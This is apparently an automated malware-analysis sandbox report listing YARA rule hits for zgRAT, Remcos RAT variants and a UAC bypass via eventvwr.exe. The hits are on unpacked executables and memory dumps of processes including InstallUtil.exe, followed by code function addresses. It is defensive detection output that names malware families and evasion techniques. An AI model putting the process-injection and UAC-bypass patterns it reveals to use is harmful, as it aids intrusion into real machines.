Source: 24.2.Qerdo.exe.5440000.4.unpack, type: UNPACKEDPE | Matched rule: Detects zgRAT Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.Qerdo.exe.48f0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects zgRAT Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.Qerdo.exe.48f0000.4.unpack, type: UNPACKEDPE | Matched rule: Detects zgRAT Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.kyFBQxVbsg.exe.4ba0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects zgRAT Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 0.2.kyFBQxVbsg.exe.4ba0000.4.unpack, type: UNPACKEDPE | Matched rule: Detects zgRAT Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
Source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
Source: 24.2.Qerdo.exe.5440000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects zgRAT Author: ditekSHen
          Source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
          Source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
          Source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
          Source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
          Source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
          Source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPEMatched rule: detects Windows exceutables potentially bypassing UAC using eventvwr.exe Author: ditekSHen
          Source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
Source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detects Windows executables potentially bypassing UAC using eventvwr.exe; Author: ditekSHen
Source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants; Author: unknown
Source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detects Windows executables potentially bypassing UAC using eventvwr.exe; Author: ditekSHen
Source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants; Author: unknown
Source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detects Windows executables potentially bypassing UAC using eventvwr.exe; Author: ditekSHen
Source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants; Author: unknown
Source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detects Windows executables potentially bypassing UAC using eventvwr.exe; Author: ditekSHen
Source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants; Author: unknown
Source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detects Windows executables potentially bypassing UAC using eventvwr.exe; Author: ditekSHen
Source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants; Author: unknown
Source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detects Windows executables potentially bypassing UAC using eventvwr.exe; Author: ditekSHen
Source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants; Author: unknown
Source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detects Windows executables potentially bypassing UAC using eventvwr.exe; Author: ditekSHen
Source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants; Author: unknown
Source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detects Windows executables potentially bypassing UAC using eventvwr.exe; Author: ditekSHen
Source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants; Author: unknown
Source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detects Windows executables potentially bypassing UAC using eventvwr.exe; Author: ditekSHen
Source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants; Author: unknown
Source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detects Windows executables potentially bypassing UAC using eventvwr.exe; Author: ditekSHen
Source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants; Author: unknown
Source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detects Windows executables potentially bypassing UAC using eventvwr.exe; Author: ditekSHen
Source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants; Author: unknown
Source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detects Windows executables potentially bypassing UAC using eventvwr.exe; Author: ditekSHen
Source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants; Author: unknown
Source: 00000013.00000002.606363285.00000000048F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Detects zgRAT; Author: ditekSHen
Source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detects Windows executables potentially bypassing UAC using eventvwr.exe; Author: ditekSHen
Source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants; Author: unknown
Source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detects Windows executables potentially bypassing UAC using eventvwr.exe; Author: ditekSHen
Source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants; Author: unknown
Source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detects Windows executables potentially bypassing UAC using eventvwr.exe; Author: ditekSHen
Source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants; Author: unknown
Source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detects Windows executables potentially bypassing UAC using eventvwr.exe; Author: ditekSHen
Source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants; Author: unknown
Source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detects Windows executables potentially bypassing UAC using eventvwr.exe; Author: ditekSHen
Source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants; Author: unknown
Source: 00000000.00000002.541870137.0000000004BA0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Detects zgRAT; Author: ditekSHen
Source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detects Windows executables potentially bypassing UAC using eventvwr.exe; Author: ditekSHen
Source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants; Author: unknown
Source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detects Windows executables potentially bypassing UAC using eventvwr.exe; Author: ditekSHen
Source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants; Author: unknown
Source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detects Windows executables potentially bypassing UAC using eventvwr.exe; Author: ditekSHen
Source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants; Author: unknown
Source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detects Windows executables potentially bypassing UAC using eventvwr.exe; Author: ditekSHen
Source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants; Author: unknown
Source: 00000018.00000002.613026227.0000000005440000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY; Matched rule: Detects zgRAT; Author: ditekSHen
Source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detects Windows executables potentially bypassing UAC using eventvwr.exe; Author: ditekSHen
Source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants; Author: unknown
Source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detects Windows executables potentially bypassing UAC using eventvwr.exe; Author: ditekSHen
Source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants; Author: unknown
Source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: detects Windows executables potentially bypassing UAC using eventvwr.exe; Author: ditekSHen
Source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY; Matched rule: REMCOS_RAT_variants; Author: unknown
Source: kyFBQxVbsg.exe, hlrb.cs; Large array initialization: nakj: array initializer size 710623
Source: 19.2.Qerdo.exe.40000.0.unpack, hlrb.cs; Large array initialization: nakj: array initializer size 710623
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe; Code function: 0_2_024AEAB8
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe; Code function: 0_2_024ADA50
Source: C:\Users\user\Desktop\kyFBQxVbsg.exe; Code function: 0_2_024AD778
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 3_2_00C8EAF7
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 3_2_00C8AEC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 3_2_00C8AF53
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 3_2_00C8768A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 3_2_00C87698
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Code function: 3_2_00C8AF90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 17_2_00435080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 17_2_0044F09C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 17_2_0043420E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 17_2_00430294
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 17_2_004422B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 17_2_00411466
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 17_2_0041A4FE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 17_2_0043C57C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 17_2_00434643
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 17_2_00424604
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 17_2_004496B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 17_2_0042476D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe; Code function: 17_2_00432771
